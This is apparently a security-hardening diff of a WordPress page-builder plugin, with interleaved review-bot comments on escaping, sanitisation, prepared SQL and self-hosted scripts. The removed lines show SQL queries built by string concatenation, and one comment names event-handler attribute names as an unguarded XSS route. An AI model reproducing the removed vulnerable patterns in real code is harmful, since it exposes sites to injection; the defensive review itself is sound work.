--- a/greenshift-animation-and-page-builder-blocks/blockrender/element/block.php
+++ b/greenshift-animation-and-page-builder-blocks/blockrender/element/block.php
@@ -170,7 +170,7 @@
$extra_filters = !empty($block['attrs']['extra_filters']) ? $block['attrs']['extra_filters'] : array();
$src = $this->embedsrc($src, $extra_filters);
}
- $p->set_attribute( 'src', $src);
+ $p->set_attribute( 'src', esc_url($src));
$html = $p->get_updated_html();
}
} else if($block['attrs']['tag'] == 'a'){
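Review bot: The `esc_url()` wrapper added on L8 is redundant as far as I know: `WP_HTML_Tag_Processor::set_attribute()` escapes string values itself, using `esc_url()` for names in `wp_kses_uri_attributes()` (`src`, `href`, `poster`, ...) and `esc_attr()` otherwise, and because `esc_attr()` does not double-encode existing entities the extra call is harmless rather than wrong. The same applies to the `esc_attr()`/`esc_url()` additions in the hunks at 240, 331, 350, 403, 415, 599, 614, 627, 664 and 789 of this file and to the `set_attribute()` hunks in init.php; the only places the outer call adds real protection are non-URI attribute names such as `data-src` and `content` (585 here, 1443 and 1468 in init.php), where the processor falls back to `esc_attr()` and applies no URL scheme filtering. If the intent is to satisfy a static escaping check, a one-line comment such as `// set_attribute() escapes the value itself; esc_url() here documents the URL context` would make the redundancy deliberate instead of looking like a misunderstanding of the API.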
@@ -240,7 +240,7 @@
$p->next_tag();
$blockid = 'api_id_'.greenshift_sanitize_id_key($block['attrs']['localId']);
$blockid = str_replace('-','_', $blockid);
- $p->set_attribute( 'data-api-id', $blockid);
+ $p->set_attribute( 'data-api-id', esc_attr($blockid));
$p->set_attribute( 'data-dynamic-api', 'true');
$p->set_attribute( 'data-dynamic-api-trigger', !empty($block['attrs']['api_filters']['ajaxTrigger']) ? esc_attr($block['attrs']['api_filters']['ajaxTrigger']) : 'load');
if(!empty($block['attrs']['api_filters']['ajaxTrigger']) && $block['attrs']['api_filters']['ajaxTrigger'] == 'form' && !empty($block['attrs']['api_filters']['ajaxSelector'])){
@@ -318,7 +318,7 @@
}else if($block['attrs']['isVariation'] == 'menu_item_link'){
// Check if current link matches the page URL
if(!empty($block['attrs']['href'])){
- $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
+ $current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . sanitize_text_field(wp_unslash($_SERVER['HTTP_HOST'])) . esc_url_raw(wp_unslash($_SERVER['REQUEST_URI']));
$link_url = $block['attrs']['href'];
// Remove trailing slashes for comparison
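Review bot: The rebuilt `$current_url` on L26 still derives the scheme from `$_SERVER['HTTPS'] === 'on'` and reads `HTTP_HOST`/`REQUEST_URI` without an `isset()` guard, so behind a TLS-terminating proxy (or on port 443 without the `HTTPS` variable) it compares an `http://` URL against an `https://` href and never marks the item current, and a CLI or cron render emits undefined-index notices. WordPress already encapsulates this: `$scheme = is_ssl() ? 'https' : 'http';` and `$host = isset($_SERVER['HTTP_HOST']) ? sanitize_text_field(wp_unslash($_SERVER['HTTP_HOST'])) : '';` (same pattern for `REQUEST_URI`), or `home_url(add_query_arg(array()))` if the configured site URL is the intended base. `HTTP_HOST` is client-supplied and `sanitize_text_field()` only strips tags from it; that is acceptable here because the value is used for a string comparison rather than output, but a short comment saying so would stop a later reader from reusing `$current_url` in markup.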
@@ -331,7 +331,7 @@
$p->next_tag();
$current_class = $p->get_attribute( 'class' );
$new_class = $current_class ? $current_class . ' current_item' : 'current_item';
- $p->set_attribute( 'class', $new_class );
+ $p->set_attribute( 'class', esc_attr($new_class) );
$p->set_attribute( 'aria-current', 'page' );
$html = $p->get_updated_html();
}
@@ -350,7 +350,7 @@
$p = new WP_HTML_Tag_Processor( $html );
$p->next_tag();
$service = esc_attr($block['attrs']['alt']);
- $p->set_attribute( 'data-social-service', $service);
+ $p->set_attribute( 'data-social-service', esc_attr($service));
if($service == 'facebook'){
global $post;
$link = get_permalink($post->ID);
@@ -403,8 +403,8 @@
while ( $p->next_tag() ) {
// Skip an element if it's not supposed to be processed.
if ( method_exists('WP_HTML_Tag_Processor', 'has_class') && ($p->has_class( 'gs_click_sync' ) || $p->has_class( 'gs_hover_sync' )) ) {
- $p->set_attribute( 'id', 'gs-trigger-'.$block['attrs']['id'].'-'.$itrigger);
- $p->set_attribute( 'aria-controls', 'gs-content-'.$block['attrs']['id'].'-'.$itrigger);
+ $p->set_attribute( 'id', 'gs-trigger-'.esc_attr($block['attrs']['id']).'-'.$itrigger);
+ $p->set_attribute( 'aria-controls', 'gs-content-'.esc_attr($block['attrs']['id']).'-'.$itrigger);
$itrigger ++;
}
}
@@ -415,8 +415,8 @@
while ( $p->next_tag() ) {
// Skip an element if it's not supposed to be processed.
if ( method_exists('WP_HTML_Tag_Processor', 'has_class') && ($p->has_class( 'gs_content' )) ) {
- $p->set_attribute( 'id', 'gs-content-'.$block['attrs']['id'].'-'.$icontent);
- $p->set_attribute( 'aria-labelledby', 'gs-trigger-'.$block['attrs']['id'].'-'.$icontent);
+ $p->set_attribute( 'id', 'gs-content-'.esc_attr($block['attrs']['id']).'-'.$icontent);
+ $p->set_attribute( 'aria-labelledby', 'gs-trigger-'.esc_attr($block['attrs']['id']).'-'.$icontent);
$icontent ++;
}
}
@@ -522,7 +522,7 @@
$turnstile_site_key = apply_filters('greenshift_turnstile_site_key', $turnstile_site_key);
if (!empty($turnstile_site_key)) {
// Enqueue Turnstile script
- wp_enqueue_script('cloudflare-turnstile', 'https://challenges.cloudflare.com/turnstile/v0/api.js', array(), null, true);
+ wp_enqueue_script('cloudflare-turnstile', GREENSHIFT_DIR_URL . 'libs/map/api.js', array(), null, true);
// Add Turnstile widget before submit button
$turnstile_widget = '<div class="cf-turnstile" data-sitekey="' . esc_attr($turnstile_site_key) . '" data-theme="auto"></div>';
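Review bot: Replacing the Turnstile client script URL on L74 with a locally bundled `libs/map/api.js` is likely to break the check rather than harden it: as far as I know Cloudflare documents that `api.js` must be loaded from `challenges.cloudflare.com` and does not support self-hosting, because the challenge logic is updated server-side and a stale copy stops producing tokens that the `siteverify` call later in this file (still pointing at Cloudflare) will accept. The practical outcome is a form whose anti-bot check fails either open or closed depending on how a missing token is handled, which should be verified before shipping. If the change is meant to avoid remote scripts for a plugin-directory guideline, the remote URL should be kept for this one dependency with a comment explaining why, e.g. `// Turnstile requires its script to be served by Cloudflare; self-hosting is unsupported`. The `libs/map/` directory name also suggests this file landed next to the Leaflet assets by accident.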
@@ -585,9 +585,9 @@
}
}
if($block['attrs']['tag'] == 'video' && !empty($block['attrs']['lazyLoadVideo'])){
- $p->set_attribute( 'data-src', $value);
+ $p->set_attribute( 'data-src', esc_url($value));
} else {
- $p->set_attribute( 'src', $value);
+ $p->set_attribute( 'src', esc_url($value));
}
if(!empty($block['attrs']['enableSrcSet']) && !empty($type['type']) && $type['type'] == 'image'){
@@ -599,7 +599,7 @@
}
$srcset = wp_get_attachment_image_srcset($id, $size);
if($srcset){
- $p->set_attribute( 'srcset', $srcset);
+ $p->set_attribute( 'srcset', esc_attr($srcset));
}
}
}
@@ -614,7 +614,7 @@
$value = GSPB_make_dynamic_text($href, $block['attrs'], $block, $block['attrs']['dynamiclink'], $href);
if($value){
$linknew = apply_filters('greenshiftseo_url_filter', $value);
- $p->set_attribute( 'href', $linknew);
+ $p->set_attribute( 'href', esc_url($linknew));
$html = $p->get_updated_html();
}else{
return '';
@@ -627,7 +627,7 @@
$p->next_tag();
$value = GSPB_make_dynamic_text($block['attrs']['poster'], $block['attrs'], $block, $block['attrs']['dynamicextra']);
if($value){
- $p->set_attribute( 'poster', $value);
+ $p->set_attribute( 'poster', esc_url($value));
$html = $p->get_updated_html();
}else{
return '';
@@ -653,7 +653,7 @@
$p = new WP_HTML_Tag_Processor( $html );
$p->next_tag();
foreach($dynamicAttributes as $index=>$value){
- $p->set_attribute( $value['name'], $value['value']);
+ $p->set_attribute( $value['name'], esc_attr($value['value']));
}
$html = $p->get_updated_html();
}
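Review bot: Escaping `$value['value']` on L120 does not restrict `$value['name']`, so a `dynamicAttributes` entry whose name is an event-handler attribute (`onerror`, `onmouseover`) or `srcdoc` is still written verbatim onto the element; `WP_HTML_Tag_Processor::set_attribute()` only rejects syntactically invalid names. Block attributes are not subject to the same filtering as post markup for users without `unfiltered_html`, so if this block can be authored by such roles the name needs an allowlist, or at minimum an event-handler guard such as `if (0 === stripos($value['name'], 'on')) { continue; }`. The loop also never checks that the keys exist, so `isset($value['name'], $value['value'])` belongs in the same condition. Where `$dynamicAttributes` originates is outside the hunk, so please confirm the trust level before choosing between allowlist and denylist.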
@@ -664,7 +664,7 @@
$anchor = str_replace('{POST_ID}', $post_id, $block['attrs']['anchor']);
$p = new WP_HTML_Tag_Processor( $html );
$p->next_tag();
- $p->set_attribute( 'id', $anchor);
+ $p->set_attribute( 'id', esc_attr($anchor));
$html = $p->get_updated_html();
}
if(!empty($block['attrs']['dynamicIndexer'])){
@@ -789,7 +789,7 @@
}
$data = rtrim($data, ',');
$data .= ']';
- $p->set_attribute( 'data-canvas-controllers', $data );
+ $p->set_attribute( 'data-canvas-controllers', esc_attr($data) );
$html = $p->get_updated_html();
}
@@ -856,8 +856,8 @@
public function process_form()
{
// Verify nonce for security
- if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'greenshift_form')) {
- wp_die(__('Security check failed', 'greenshift-animation-and-page-builder-blocks'));
+ if (!isset($_POST['_wpnonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['_wpnonce'])), 'greenshift_form')) {
+ wp_die(esc_html__('Security check failed', 'greenshift-animation-and-page-builder-blocks'));
}
// Get form type
@@ -903,10 +903,11 @@
// Verify Turnstile token with Cloudflare API
$verify_url = 'https://challenges.cloudflare.com/turnstile/v0/siteverify';
+ $remote_ip = isset($_SERVER['REMOTE_ADDR']) ? filter_var(wp_unslash($_SERVER['REMOTE_ADDR']), FILTER_VALIDATE_IP) : '';
$verify_data = array(
'secret' => $turnstile_secret_key,
'response' => $turnstile_token,
- 'remoteip' => $_SERVER['REMOTE_ADDR']
+ 'remoteip' => $remote_ip ? $remote_ip : ''
);
$verify_response = wp_remote_post($verify_url, array(
@@ -972,7 +973,8 @@
$to = apply_filters('greenshift_contact_form_email', get_option('admin_email'));
// Prepare email
- $subject = sprintf(__('New Contact Form Submission from %s', 'gl-page-builder'), get_bloginfo('name'));
+ /* translators: 1: Blog name */
+ $subject = sprintf(__('New Contact Form Submission from %s', 'greenshift-animation-and-page-builder-blocks'), get_bloginfo('name'));
$subject = apply_filters('greenshift_contact_form_subject', $subject);
$email_message = sprintf("%sn%sn%s", $name, $email, $message);
--- a/greenshift-animation-and-page-builder-blocks/blockrender/toc/block.php
+++ b/greenshift-animation-and-page-builder-blocks/blockrender/toc/block.php
@@ -261,7 +261,7 @@
for($j = 0; $j < count($class_matches[1]); $j++) {
$headings[$i]["classes"] = explode(" ", $class_matches[1][$j]);
}
- $headings[$i]["name"] = strip_tags($matches[3][$i]);
+ $headings[$i]["name"] = wp_strip_all_tags($matches[3][$i]);
}
return $headings;
}
--- a/greenshift-animation-and-page-builder-blocks/build/gspbLibrary.asset.php
+++ b/greenshift-animation-and-page-builder-blocks/build/gspbLibrary.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom', 'wp-element', 'wp-i18n', 'wp-polyfill', 'wp-rich-text'), 'version' => '621dec406b405f780002');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom', 'wp-element', 'wp-i18n', 'wp-polyfill', 'wp-rich-text'), 'version' => '6738b1be92db0bfc20e2');
--- a/greenshift-animation-and-page-builder-blocks/build/gspbSiteEditor.asset.php
+++ b/greenshift-animation-and-page-builder-blocks/build/gspbSiteEditor.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-components', 'wp-element', 'wp-i18n'), 'version' => 'ca783a744730fadefc33');
+<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-components', 'wp-element', 'wp-i18n'), 'version' => 'c73631bb1c141217856c');
--- a/greenshift-animation-and-page-builder-blocks/edd/EddLicensePage.php
+++ b/greenshift-animation-and-page-builder-blocks/edd/EddLicensePage.php
@@ -212,7 +212,7 @@
<div class="wp-block-greenshift-blocks-container gspb_container gspb_container-gsbp-89d45563-1559" id="gspb_container-id-gsbp-89d45563-1559">
<div class="wp-block-greenshift-blocks-container gspb_container gspb_container-gsbp-efb64efe-d083" id="gspb_container-id-gsbp-efb64efe-d083">
- <h2 id="gspb_heading-id-gsbp-ca0b0ada-6561" class="gspb_heading gspb_heading-id-gsbp-ca0b0ada-6561 "><?php esc_html_e('Plugins License Options'); ?></h2>
+ <h2 id="gspb_heading-id-gsbp-ca0b0ada-6561" class="gspb_heading gspb_heading-id-gsbp-ca0b0ada-6561 "><?php esc_html_e('Plugins License Options', 'greenshift-animation-and-page-builder-blocks'); ?></h2>
</div>
@@ -257,7 +257,7 @@
<?php
if ('valid' !== $status) {
printf(
- '<input type="password" autocomplete="off" class="regular-text" id="edd_license_key_' . $args['product'] . '" name="edd_license_key_' . $args['product'] . '" value="%s" />',
+ '<input type="password" autocomplete="off" class="regular-text" id="edd_license_key_' . esc_attr($args['product']) . '" name="edd_license_key_' . esc_attr($args['product']) . '" value="%s" />',
esc_attr($license)
);
} else {
@@ -318,7 +318,7 @@
$this->licensesData[$key]['status'] = '';
$this->licensesData[$key]['expires'] = '';
}
- $this->licensesData[$key]['license'] = $_POST[$data['license_key']];
+ $this->licensesData[$key]['license'] = sanitize_text_field($_POST[$data['license_key']]);
}
}
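Review bot: `sanitize_text_field($_POST[$data['license_key']])` on L213 is missing the `wp_unslash()` that every other `$_POST`/`$_SERVER` read in this patch applies (compare L147), so a key containing a quote or backslash is stored with magic-quote slashes and will not validate against the license server. It also indexes `$_POST` without checking that the key exists. Suggested: `$this->licensesData[$key]['license'] = isset($_POST[$data['license_key']]) ? sanitize_text_field(wp_unslash($_POST[$data['license_key']])) : '';`. The nonce and capability checks that should precede this write are outside the hunk, so I cannot confirm them here.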
@@ -565,7 +565,7 @@
if (is_wp_error($response)) {
$message = $response->get_error_message();
} else {
- $message = __('An error occurred, please try again.');
+ $message = __('An error occurred, please try again.', 'greenshift-animation-and-page-builder-blocks');
}
$redirect = add_query_arg(
--- a/greenshift-animation-and-page-builder-blocks/edd/edd_constants.php
+++ b/greenshift-animation-and-page-builder-blocks/edd/edd_constants.php
@@ -1,4 +1,5 @@
<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
define( 'EDD_CONSTANTS', true );
define( 'EDD_GSPB_PLUGIN_LICENSE_PAGE', 'greenshift-license' );
--- a/greenshift-animation-and-page-builder-blocks/includes/helper.php
+++ b/greenshift-animation-and-page-builder-blocks/includes/helper.php
@@ -1060,6 +1060,7 @@
$styletocopy = $option['css'];
$styletocopy = gspb_get_final_css($styletocopy);
$styletocopy = htmlspecialchars_decode($styletocopy);
+ $styletocopy = wp_strip_all_tags($styletocopy);
$styleStore->addClassStyle($value, $styletocopy);
}
else{
@@ -1074,6 +1075,7 @@
$styletocopy = $selector['css'];
$styletocopy = gspb_get_final_css($styletocopy);
$styletocopy = htmlspecialchars_decode($styletocopy);
+ $styletocopy = wp_strip_all_tags($styletocopy);
$styleStore->addClassStyle($value.$selector['value'], $styletocopy);
}
else{
@@ -1382,10 +1384,10 @@
}
}
if(strpos($value, '{{CURRENT_DATE_YMD}}') !== false){
- $value = str_replace('{{CURRENT_DATE_YMD}}', date('Y-m-d'), $value);
+ $value = str_replace('{{CURRENT_DATE_YMD}}', gmdate('Y-m-d'), $value);
}
if(strpos($value, '{{CURRENT_DATE_YMD_HMS}}') !== false){
- $value = str_replace('{{CURRENT_DATE_YMD_HMS}}', date('Y-m-d H:i:s'), $value);
+ $value = str_replace('{{CURRENT_DATE_YMD_HMS}}', gmdate('Y-m-d H:i:s'), $value);
}
if(strpos($value, '{{TIMESTRING:') !== false){
$pattern = '/{TIMESTRING:(.*?)}/';
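Review bot: Switching `date()` to `gmdate()` on L254 and L258 is a behaviour change, not just a lint fix: `{{CURRENT_DATE_YMD}}` now renders the UTC date, so sites with a non-UTC timezone setting will see yesterday's or tomorrow's date for part of each day. The WordPress-idiomatic replacement that keeps the site's timezone is `wp_date('Y-m-d')` / `wp_date('Y-m-d H:i:s')` (or `current_time(...)`), which also satisfies the coding-standards sniff that presumably motivated the change. If UTC really is intended, a comment such as `// placeholder intentionally renders UTC, independent of the site timezone` would stop the next reader from "fixing" it back.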
@@ -1415,7 +1417,8 @@
if(!empty($matches[1])){
foreach($matches[1] as $val){
if(!empty($_COOKIE[$val])){
- $value = str_replace('{{COOKIE:'.$val.'}}', $_COOKIE[$val], $value);
+ $cookie_value = sanitize_text_field(wp_unslash($_COOKIE[$val]));
+ $value = str_replace('{{COOKIE:'.$val.'}}', $cookie_value, $value);
}
}
}
@@ -1444,7 +1447,7 @@
if (count($range) === 2 && is_numeric(trim($range[0])) && is_numeric(trim($range[1]))) {
$min = (float) trim($range[0]);
$max = (float) trim($range[1]);
- $replacement = $min + (mt_rand() / mt_getrandmax()) * ($max - $min);
+ $replacement = $min + (wp_rand() / mt_getrandmax()) * ($max - $min);
}
}
// If the value includes "|" then randomly select a value from the list.
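Review bot: `wp_rand() / mt_getrandmax()` on L277 no longer yields a value in `[0, 1]`: called without arguments `wp_rand()` draws from `0..4294967295` (as far as I know), whereas `mt_getrandmax()` is `2147483647`, so the ratio ranges up to about 2 and `$replacement` can land outside `[$min, $max]`. Pass an explicit upper bound so numerator and denominator agree: `$replacement = $min + (wp_rand(0, mt_getrandmax()) / mt_getrandmax()) * ($max - $min);`. This placeholder is not security-sensitive, so the original `mt_rand()` was only a style issue; the range bug is the real regression introduced here.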
--- a/greenshift-animation-and-page-builder-blocks/includes/importer.php
+++ b/greenshift-animation-and-page-builder-blocks/includes/importer.php
@@ -200,7 +200,7 @@
header('Content-Type: text/xml; charset=' . get_option('blog_charset'), true);
}
- echo ''.$importcontent;
+ echo $importcontent;
exit;
}
}
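Review bot: `echo $importcontent;` on L287 is raw output in an export endpoint that serves `text/xml`, which is deliberate (escaping would corrupt the document) but unmarked, so it will keep tripping escaping sniffs and inviting a well-meant `esc_html()`. A justification comment on that line, e.g. `// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- serialized XML export, built from escaped values`, records the intent; that claim should be verified against the code that builds `$importcontent`, which is outside this hunk. Adding `header('X-Content-Type-Options: nosniff');` next to the existing Content-Type header would also stop browsers from sniffing the response as HTML if it is ever opened directly.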
@@ -214,8 +214,8 @@
*/
function greenshift_design_importer($file='') {
- $label_updated = __( 'Updated', 'greenshift-animation-and-page-builder-blocks' );
- $label_imported = __( 'Imported', 'greenshift-animation-and-page-builder-blocks' );
+ $label_updated = esc_html__( 'Updated', 'greenshift-animation-and-page-builder-blocks' );
+ $label_imported = esc_html__( 'Imported', 'greenshift-animation-and-page-builder-blocks' );
if($file){
$xml = simplexml_load_file($file);
@@ -228,6 +228,7 @@
return false;
} else if ( ! file_exists( $file['file'] ) ) {
echo '<p><strong>' . esc_html__( 'Sorry, there has been an error.', 'greenshift-animation-and-page-builder-blocks' ) . '</strong><br />';
+ /* translators: code of file */
printf( esc_html__( 'The export file could not be found at <code>%s</code>. It is likely that this was caused by a permissions problem.', 'greenshift-animation-and-page-builder-blocks' ), esc_html( $file['file'] ) );
echo '</p>';
return false;
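Review bot: The translators comment added on L304 sits above a string whose `<code>%s</code>` is passed through `esc_html__()`, so the tags are entity-encoded and rendered literally as `<code>…</code>` text rather than markup. Either keep the markup out of the translatable string, `printf( esc_html__( 'The export file could not be found at %s. It is likely that this was caused by a permissions problem.', 'greenshift-animation-and-page-builder-blocks' ), '<code>' . esc_html( $file['file'] ) . '</code>' );`, or run the translated string through `wp_kses( __( … ), array( 'code' => array() ) )`. The comment itself should name the placeholder, e.g. `/* translators: %s: path of the export file */`.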
@@ -328,19 +329,19 @@
$post_type_name = '';
if ( $post_type === 'wp_template' ) {
- $post_type_name = __( 'template', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'template', 'greenshift-animation-and-page-builder-blocks' );
} elseif ( $post_type === 'wp_template_part' ) {
- $post_type_name = __( 'template part', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'template part', 'greenshift-animation-and-page-builder-blocks' );
} elseif ( $post_type === 'wp_global_styles' ) {
- $post_type_name = __( 'custom styles', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'custom styles', 'greenshift-animation-and-page-builder-blocks' );
}elseif ( $post_type === 'wp_block' ) {
- $post_type_name = __( 'reusable templates', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'reusable templates', 'greenshift-animation-and-page-builder-blocks' );
}elseif ( $post_type === 'post' ) {
- $post_type_name = __( 'posts', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'posts', 'greenshift-animation-and-page-builder-blocks' );
}elseif ( $post_type === 'page' ) {
- $post_type_name = __( 'pages', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'pages', 'greenshift-animation-and-page-builder-blocks' );
}elseif ( $post_type === 'product' ) {
- $post_type_name = __( 'products', 'greenshift-animation-and-page-builder-blocks' );
+ $post_type_name = esc_html__( 'products', 'greenshift-animation-and-page-builder-blocks' );
}else{
$post_type_name = $post_type;
}
@@ -521,13 +522,13 @@
if(!empty($updated_types)){
$updated_types = array_unique($updated_types);
$updated_types = implode(', ', $updated_types);
- echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_updated ) . ': ' . $updated_types .'</li>';
+ echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_updated ) . ': ' .esc_attr( $updated_types) .'</li>';
}
if(!empty($new_types)){
$new_types = array_unique($new_types);
$new_types = implode(', ', $new_types);
- echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_imported ) . ': ' . $new_types .'</li>';
+ echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_imported ) . ': ' . esc_attr($new_types) .'</li>';
}
if(!empty($thumbnails_old_ids)){
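Review bot: `esc_attr( $updated_types )` on L339 and `esc_attr($new_types)` on L345 escape text-node content with the attribute escaper while the label on the same line uses `esc_html()`; the output is identical today, but the context-correct call is `esc_html()` and mixing the two on one line reads as an accident. Suggested: `': ' . esc_html( $updated_types ) . '</li>'` and the matching `esc_html( $new_types )`. Note that `$updated_types` is built from `$post_type_name`, which falls through unescaped for unknown post types in the hunk at 328, so the escape here is the only one protecting that path and should stay.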
@@ -610,7 +611,7 @@
$post_id_update = 0;
- $template_posts = $wpdb->get_results( "SELECT ID FROM $wpdb->posts WHERE post_name = '" . $post_name . "' AND post_type = '" . $post_type . "'" );
+ $template_posts = $wpdb->get_results( $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE post_name = %s AND post_type = %s", $post_name, $post_type ) );
if ( $template_posts ) {
foreach ( $template_posts as $template_post ) {
@@ -632,7 +633,7 @@
} else {
- $post_id = $wpdb->get_row( "SELECT ID FROM $wpdb->posts WHERE post_name = '" . $post_name . "' AND post_type = '" . $post_type . "'" );
+ $post_id = $wpdb->get_row( $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE post_name = %s AND post_type = %s", $post_name, $post_type ) );
if ( $post_id ) {
$todo = array( 'post_id' => $post_id->ID, 'action' => 'update' );
} else {
@@ -721,7 +722,7 @@
function greenshift_process_attachment( $post, $url ) {
// Extract the file name from the URL.
- $path = parse_url( $url, PHP_URL_PATH );
+ $path = wp_parse_url( $url, PHP_URL_PATH );
$file_name = '';
if ( is_string( $path ) ) {
$file_name = basename( $path );
@@ -733,7 +734,7 @@
$tmp_file_name = wp_tempnam( $file_name );
if ( ! $tmp_file_name ) {
- return new WP_Error( 'import_no_file', __( 'Could not create temporary file.', 'greenshift-animation-and-page-builder-blocks' ) );
+ return new WP_Error( 'import_no_file', esc_html__( 'Could not create temporary file.', 'greenshift-animation-and-page-builder-blocks' ) );
}
// Fetch the remote URL and write it to the placeholder file.
@@ -750,12 +751,12 @@
);
if ( is_wp_error( $remote_response ) ) {
- @unlink( $tmp_file_name );
+ wp_delete_file( $tmp_file_name );
return new WP_Error(
'import_file_error',
sprintf(
/* translators: 1: The WordPress error message. 2: The WordPress error code. */
- __( 'Request failed due to an error: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
+ esc_html__( 'Request failed due to an error: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
esc_html( $remote_response->get_error_message() ),
esc_html( $remote_response->get_error_code() )
)
@@ -766,12 +767,12 @@
// Make sure the fetch was successful.
if ( 200 !== $remote_response_code ) {
- @unlink( $tmp_file_name );
+ wp_delete_file( $tmp_file_name );
return new WP_Error(
'import_file_error',
sprintf(
/* translators: 1: The HTTP error message. 2: The HTTP error code. */
- __( 'Remote server returned the following unexpected result: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
+ esc_html__( 'Remote server returned the following unexpected result: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
get_status_header_desc( $remote_response_code ),
esc_html( $remote_response_code )
)
@@ -782,26 +783,27 @@
// Request failed.
if ( ! $headers ) {
- @unlink( $tmp_file_name );
- return new WP_Error( 'import_file_error', __( 'Remote server did not respond', 'greenshift-animation-and-page-builder-blocks' ) );
+ wp_delete_file( $tmp_file_name );
+ return new WP_Error( 'import_file_error', esc_html__( 'Remote server did not respond', 'greenshift-animation-and-page-builder-blocks' ) );
}
$filesize = (int) filesize( $tmp_file_name );
if ( 0 === $filesize ) {
- @unlink( $tmp_file_name );
- return new WP_Error( 'import_file_error', __( 'Zero size file downloaded', 'greenshift-animation-and-page-builder-blocks' ) );
+ wp_delete_file( $tmp_file_name );
+ return new WP_Error( 'import_file_error', esc_html__( 'Zero size file downloaded', 'greenshift-animation-and-page-builder-blocks' ) );
}
if ( ! isset( $headers['content-encoding'] ) && isset( $headers['content-length'] ) && $filesize !== (int) $headers['content-length'] ) {
- @unlink( $tmp_file_name );
- return new WP_Error( 'import_file_error', __( 'Downloaded file has incorrect size', 'greenshift-animation-and-page-builder-blocks' ) );
+ wp_delete_file( $tmp_file_name );
+ return new WP_Error( 'import_file_error', esc_html__( 'Downloaded file has incorrect size', 'greenshift-animation-and-page-builder-blocks' ) );
}
$max_size = (int) apply_filters( 'import_attachment_size_limit', 0 );
if ( ! empty( $max_size ) && $filesize > $max_size ) {
- @unlink( $tmp_file_name );
- return new WP_Error( 'import_file_error', sprintf( __( 'Remote file is too large, limit is %s', 'greenshift-animation-and-page-builder-blocks' ), size_format( $max_size ) ) );
+ wp_delete_file( $tmp_file_name );
+ /* translators: limit file size */
+ return new WP_Error( 'import_file_error', sprintf( esc_html__( 'Remote file is too large, limit is %s', 'greenshift-animation-and-page-builder-blocks' ), size_format( $max_size ) ) );
}
// Handle the upload like _wp_handle_upload() does.
@@ -816,7 +818,7 @@
}
if ( ( ! $type || ! $ext ) && ! current_user_can( 'unfiltered_upload' ) ) {
- return new WP_Error( 'import_file_error', __( 'Sorry, this file type is not permitted for security reasons.', 'greenshift-animation-and-page-builder-blocks' ) );
+ return new WP_Error( 'import_file_error', esc_html__( 'Sorry, this file type is not permitted for security reasons.', 'greenshift-animation-and-page-builder-blocks' ) );
}
$uploads = wp_upload_dir( $post['upload_date'] );
@@ -830,8 +832,8 @@
$move_new_file = copy( $tmp_file_name, $new_file );
if ( ! $move_new_file ) {
- @unlink( $tmp_file_name );
- return new WP_Error( 'import_file_error', __( 'The uploaded file could not be moved', 'greenshift-animation-and-page-builder-blocks' ) );
+ wp_delete_file( $tmp_file_name );
+ return new WP_Error( 'import_file_error', esc_html__( 'The uploaded file could not be moved', 'greenshift-animation-and-page-builder-blocks' ) );
}
// Set correct file permissions.
@@ -855,7 +857,7 @@
if ( $info ) {
$post['post_mime_type'] = $info['type'];
} else {
- return new WP_Error( 'attachment_processing_error', __( 'Invalid file type', 'greenshift-animation-and-page-builder-blocks' ) );
+ return new WP_Error( 'attachment_processing_error', esc_html__( 'Invalid file type', 'greenshift-animation-and-page-builder-blocks' ) );
}
$post['guid'] = $upload['url'];
--- a/greenshift-animation-and-page-builder-blocks/includes/jsoptimization.php
+++ b/greenshift-animation-and-page-builder-blocks/includes/jsoptimization.php
@@ -1,5 +1,5 @@
<?php
-
+if ( ! defined( 'ABSPATH' ) ) exit;
class GSPBLazyOptimization {
@@ -42,7 +42,7 @@
$allowedpagesArray = array( );
- $current_url = home_url( $_SERVER['REQUEST_URI'] );
+ $current_url = home_url( esc_url_raw( wp_unslash( $_SERVER['REQUEST_URI'] ) ) );
$delay_js_page_list = !empty($global_settings['jsdelay']['delay_js_page_list']) ? $global_settings['jsdelay']['delay_js_page_list'] : '';
--- a/greenshift-animation-and-page-builder-blocks/init.php
+++ b/greenshift-animation-and-page-builder-blocks/init.php
@@ -674,7 +674,7 @@
wp_register_script(
'gspb_osmap',
- 'https://unpkg.com/leaflet@1.9.3/dist/leaflet.js',
+ GREENSHIFT_DIR_URL . 'libs/map/leaflet.js',
array(),
'1.9.3',
true
@@ -682,7 +682,7 @@
wp_register_style(
'gspb_osmap_style',
- 'https://unpkg.com/leaflet@1.9.3/dist/leaflet.css',
+ GREENSHIFT_DIR_URL . 'libs/map/leaflet.css',
